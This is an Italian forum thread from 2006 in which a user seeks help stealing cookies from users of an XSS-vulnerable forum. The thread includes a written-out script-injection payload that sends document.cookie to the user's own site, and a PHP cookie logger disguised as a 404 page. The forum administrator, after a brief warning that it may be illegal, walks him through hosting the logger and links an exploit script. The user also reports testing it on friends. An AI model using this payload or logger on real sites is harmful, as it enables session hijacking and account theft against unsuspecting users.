Il Forum di Orebla.it

Benvenuto nella community di Orebla.it
Oggi è mer 23 ott, 2019 4:41 pm

Tutti gli orari sono UTC + 1 ora




Apri un nuovo argomento Rispondi all’argomento  [ 14 messaggi ] 
Autore Messaggio
 Oggetto del messaggio: XSS + script su altervista (?)
Messaggio da leggereInviato: gio 02 nov, 2006 7:17 pm 
Non connesso
Newbie
Newbie

Iscritto il: gio 02 nov, 2006 7:05 pm
Messaggi: 8
Ciao orebla!

Da quando ho visto sei molto esperto nel campo di XSS.

Allora il mio problema ? il seguente:

Volevo dei chiarimenti su come rubare i cookie dell'admin o semplice user di un forum vulnerabile XSS.
Allora io in un nuovo topic inserisco:
<sc ript> wi ndow.loca tion="http://www.miosito.com/script.php?data=" + document.c ookie </scr ipt>
Per? su http://www.miosito.com/script.php ci devo mettere su uno script in php o javascript, giusto?
Ecco. io ho elaborato lo script in php.
Codice:
    <ht ml>
    <head>
    <title>404 Not Found</title>
    </head><body>
    <h1>Not Found</h1>
    <?ph p
    $capo = "
    ";
    $_G ET['da ta'] = $data;
    $fh = fopen("co oki e.txt",'a+');
    fwrite($f h, "$da ta");
    fw rite($ fh, "$ca po");
    fclose($fh);
    ?>
    <p>The requ ested U RL was not found on this server.</p>
    </bod y></html>   

Questo script fa si che una volta andato sulla pagina viene visualizzato: NOT FOUND ,ECC ECC.
Ecco, fin qua ci sono.
Il mio problema per? ? quello di inserire lo script su ALTERVISTA.
Non riesco , o meglio non so precisamente, come si fa.
E non so nemmeno su come vedere i cookie.

Dopo che accedo a PhpMyAdmin su altervista che devo fare?
Dove inserisco il sorgente?
COme visualizzo i cookie?

Grazie orebla in anticipo.

p.s. non sono n? hacker (macch?) , n? lamer, n? cracker , nessuno. E solo per ampliare le mie conoscenze su XSS (specialmente la cosas di altervista).


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: ven 03 nov, 2006 9:13 am 
Non connesso
Amministratore
Amministratore
Avatar utente

Iscritto il: lun 27 dic, 2004 10:32 am
Messaggi: 2614
Località: Ferrara
Intanto ti devo SOTTOLINEARE che rubare i cookie potrebbe essere reato, non ne sono sicuro ma meglio fartelo presente!

Cmq il file script.php deve essere caricato tramite FTP sul tuo dominio http://www.miosito.com. PhpMyAdmin non c'entra nulla in quanto gestisce il database...

Per? non ho ben capito il tuo problema, non riesci a caricare il file script.php sul tuo sito oppure non riesci a far andare lo script javascript per rubare il cookie?

_________________
I'm so happy because today
I've found my friends ...
They're in my head

[NIRVANA - LITHIUM]
Il Blog del disperato: http://blog.orebla.it


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: ven 03 nov, 2006 2:11 pm 
Non connesso
Newbie
Newbie

Iscritto il: gio 02 nov, 2006 7:05 pm
Messaggi: 8
Non so come caricare lo script.

Nel senso che dove devo andare precisamente per caricarlo??

E dopo, per vedere i cookie, dove devo andare su altervista?


Grazie.

p.s. scusa se ti chiedo di dirmi precisamente ma non capisco dove :(


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: ven 03 nov, 2006 5:54 pm 
Non connesso
Amministratore
Amministratore
Avatar utente

Iscritto il: lun 27 dic, 2004 10:32 am
Messaggi: 2614
Località: Ferrara
Ma tu come accedi al tuo spazio altervista?? Dal sito di altervista o da un programma FTP??

_________________
I'm so happy because today
I've found my friends ...
They're in my head

[NIRVANA - LITHIUM]
Il Blog del disperato: http://blog.orebla.it


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: ven 03 nov, 2006 6:34 pm 
Non connesso
Newbie
Newbie

Iscritto il: gio 02 nov, 2006 7:05 pm
Messaggi: 8
orebla ha scritto:
Ma tu come accedi al tuo spazio altervista?? Dal sito di altervista o da un programma FTP??


Dal sito altervista... se no come devo fare??

Dimmi tu...

Thanks


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: ven 03 nov, 2006 6:41 pm 
Non connesso
Amministratore
Amministratore
Avatar utente

Iscritto il: lun 27 dic, 2004 10:32 am
Messaggi: 2614
Località: Ferrara
Ci sono diversi modi per accedere ad uno spazio web al servizio FTP.

Cmq tu accedi dal pannello di altervista, poi nel menu in altro trovi la voce "Gestione File". ? la seconda da sinistra.

Una volta caricata la pagina trovi il pulsante "Invia File". Ci clicchi poi carichi il file sul tuo sito!

_________________
I'm so happy because today
I've found my friends ...
They're in my head

[NIRVANA - LITHIUM]
Il Blog del disperato: http://blog.orebla.it


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: sab 04 nov, 2006 1:05 pm 
Non connesso
Newbie
Newbie

Iscritto il: gio 02 nov, 2006 7:05 pm
Messaggi: 8
Hmmmm allora... se non sbaglio devo fare in questo modo:

1. scrivo il sorgente in un nuovo documento di testo (dopo rinomino in script.php);

2. Vado su altervista in Gestione files.

3. Invia files (e metto il percorso del file script).

4. Cosa faccio?
Mettiamo il caso che una persona sia andata sulla pagina dove c'? lo script giusto? Come faccio io a vedere dopo i cookie?
Dove devo andare?


E poi, ? giusto quello che ho detto nei passaggi 1,2,3?


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: sab 04 nov, 2006 1:15 pm 
Non connesso
Newbie
Newbie

Iscritto il: gio 02 nov, 2006 7:05 pm
Messaggi: 8
Hmmmm mi appare un file txt con nome: cookie.txt.
mmm ok..

Per? come faccio a vedere i cookies che vengono saltavi in questo documento?

Clicco per salvare il cookie.txt sul computer ma mi dice:
Errore, il file non esiste o il suo nome contiene caratteri non validi

Che devo fare per prenderlo sul pc? Cambiare estensione?

p.s. grazie orebla, per tutto


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: sab 04 nov, 2006 2:32 pm 
Non connesso
Amministratore
Amministratore
Avatar utente

Iscritto il: lun 27 dic, 2004 10:32 am
Messaggi: 2614
Località: Ferrara
Guarda vedo che di php non ne sai molto....

Cmq lo script produce un semplice file di testo che pu? essere letto con tutto! puoi leggerlo con il browser, con il notepad, con Word...

_________________
I'm so happy because today
I've found my friends ...
They're in my head

[NIRVANA - LITHIUM]
Il Blog del disperato: http://blog.orebla.it


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: sab 04 nov, 2006 5:01 pm 
Non connesso
Newbie
Newbie

Iscritto il: gio 02 nov, 2006 7:05 pm
Messaggi: 8
orebla ha scritto:
Guarda vedo che di php non ne sai molto....

Cmq lo script produce un semplice file di testo che pu? essere letto con tutto! puoi leggerlo con il browser, con il notepad, con Word...


Si ma non me lo vuole scaricare il txt.... come mai?? Mi dice: Errore, il file non esiste o il suo nome contiene caratteri non validi.


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: dom 05 nov, 2006 11:10 am 
Non connesso
Amministratore
Amministratore
Avatar utente

Iscritto il: lun 27 dic, 2004 10:32 am
Messaggi: 2614
Località: Ferrara
Prova a usare questo di script per ricevere i cookie: http://www.milw0rm.com/exploits/1103

_________________
I'm so happy because today
I've found my friends ...
They're in my head

[NIRVANA - LITHIUM]
Il Blog del disperato: http://blog.orebla.it


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: dom 05 nov, 2006 4:42 pm 
Non connesso
Newbie
Newbie

Iscritto il: gio 02 nov, 2006 7:05 pm
Messaggi: 8
orebla.....

funziona.... diciamo pi? o meno.

Grazie per tutto. Ma non riesco a capire una cosa.

Se dico per esempio a un mio amico di andare sull'indirizzo dell'immagine che contiene pure lo script in php.... non riesco a prenderli i cookies... perch??
SI pu? solo con: <sc ript> wi ndow.loca tion="http://www.miosito.com/script.php?data=" + document.c ookie </scr ipt> ???

Perch? quando ci clicca un mio amico mi visualizza solo ip ma niente cookies... mentre ci clicco io mi visualizza anche dei cookies. :(

p.s. ho provato con molti altri amici ma non funziona lo stesso. L'ho fatto solo perch? non capivo questa cosa niente di pi? ;)


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: lun 06 nov, 2006 1:30 pm 
Non connesso
Amministratore
Amministratore
Avatar utente

Iscritto il: lun 27 dic, 2004 10:32 am
Messaggi: 2614
Località: Ferrara
Semplice! Devi sapere una piccola cosina su come i browser gestiscono i cookie.

Mettiamo che ho due siti:

http://www.sito1.it e http://www.sito2.it

Vado su tutti e due i siti e mi vengono creati due cookie diversi:

cookie1 (relativo a sito1.it) e cookie2 (relativo a sito2.it)

Quando io effettuo il cookie grabber, per rubargli il cookie metto lo script in una pagina sul sito1.it.

Il risultato dar? solamente cookie1!!! Perch? il browser restituisce i diversi cookie relativamente al sito in cui naviga.

Per ci?, a meno che non vi siano bug sul browser, io sul sito1.it non posso rubare il cookie2!! Per questo vedi il tuo ma non quello del tuo amico.
Perch? il tuo amico non ha nessun cookie sul tuo sito!

Il movente degli XSS ? appunto questo!! Iniettando codice HTML nella pagina del http://www.sito2.it (che non ? mio) riesco a rubare il cookie2!!

Sarebbe inutile rubare i cookie dei tuoi utenti....

Queste sono le basi di XSS!!

_________________
I'm so happy because today
I've found my friends ...
They're in my head

[NIRVANA - LITHIUM]
Il Blog del disperato: http://blog.orebla.it


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: lun 06 nov, 2006 6:34 pm 
Non connesso
Newbie
Newbie

Iscritto il: gio 02 nov, 2006 7:05 pm
Messaggi: 8
Ma che grande!!!!!!!!!!

Non ci ho pensato!

Fantastico... grazie sei un grandissimo orebla!! ;) ;)

Finalmente ho capito come cavolo funziona.

Un'ultimissima cosa... che vuol dire chmod to 666 o 777??

p.s. thanks.... appena ho tempo ti elaboro una cosettina come ringraziamento... se apprezzerai ^^


Top
 Profilo  
 
Visualizza ultimi messaggi:  Ordina per  
Apri un nuovo argomento Rispondi all’argomento  [ 14 messaggi ] 

Tutti gli orari sono UTC + 1 ora


{ RELATED_TOPICS }
 Argomenti   Autore   Risposte   Visite    Ultimo messaggio 
Non ci sono nuovi messaggi in questo argomento. Allegato(i) [Tutorial] Mascherare uno script PHP in un'immagine JPEG

BlackLight

8

4790

gio 15 feb, 2007 5:31 pm

Daredevil Vedi ultimi messaggi

 


Chi c’è in linea

Visitano il forum: Nessuno e 2 ospiti


Non puoi aprire nuovi argomenti
Non puoi rispondere negli argomenti
Non puoi modificare i tuoi messaggi
Non puoi cancellare i tuoi messaggi
Non puoi inviare allegati

Cerca per:
Vai a:  
cron
Powered by phpBB® Forum Software © phpBB Group
Traduzione Italiana phpBBItalia.net basata su phpBB.it 2010
phpBB SEO